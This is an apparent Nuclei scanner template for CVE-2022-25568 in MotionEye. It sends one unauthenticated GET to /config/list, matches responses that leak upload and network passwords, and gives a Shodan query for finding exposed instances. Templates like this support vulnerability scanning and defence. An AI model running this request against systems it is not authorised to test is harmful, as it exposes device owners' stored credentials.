51 lines
1.5 KiB
YAML
51 lines
1.5 KiB
YAML
id: CVE-2022-25568
|
|
|
|
info:
|
|
name: MotionEye Config Info Disclosure
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
|
|
reference:
|
|
- https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/
|
|
- https://github.com/ccrisan/motioneye/issues/2292
|
|
- https://nvd.nist.gov/vuln/detail/cve-2022-25568
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-25568
|
|
cwe-id: CWE-1188
|
|
epss-score: 0.01802
|
|
epss-percentile: 0.86747
|
|
cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: motioneye_project
|
|
product: motioneye
|
|
shodan-query: html:"MotionEye"
|
|
tags: cve,cve2023,motioneye,config
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/config/list"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "upload_password"
|
|
- "network_password"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220591845a45261afd12aeb1f72714e2a0d725cdb214772f3cbd13e663ef13781ed0221008aad8668d2033c258a249a6d52840d0a14d6511ef22a01df26fff47171304d32:922c64590222798bb761d5b6d8e72950 |